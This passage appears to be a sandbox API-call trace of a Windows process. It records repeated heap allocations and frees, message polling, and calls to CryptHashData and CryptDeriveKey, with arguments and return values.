returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0162.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0162.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x34aa358, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0162.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.806] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0162.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0162.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0162.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0162.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0162.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0162.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.807] CryptHashData (hHash=0xaa56a0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0162.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0162.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0162.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0162.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0162.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0162.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0162.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0162.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0162.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.810] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0162.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.811] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0162.811] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.811] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0162.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.812] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.812] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.812] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0162.812] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0162.812] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0162.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0162.812] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0162.812] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.813] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0162.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.813] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa56a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0162.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0162.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0162.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0162.815] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0162.815] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0162.815] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.815] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0162.815] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.815] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0162.816] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 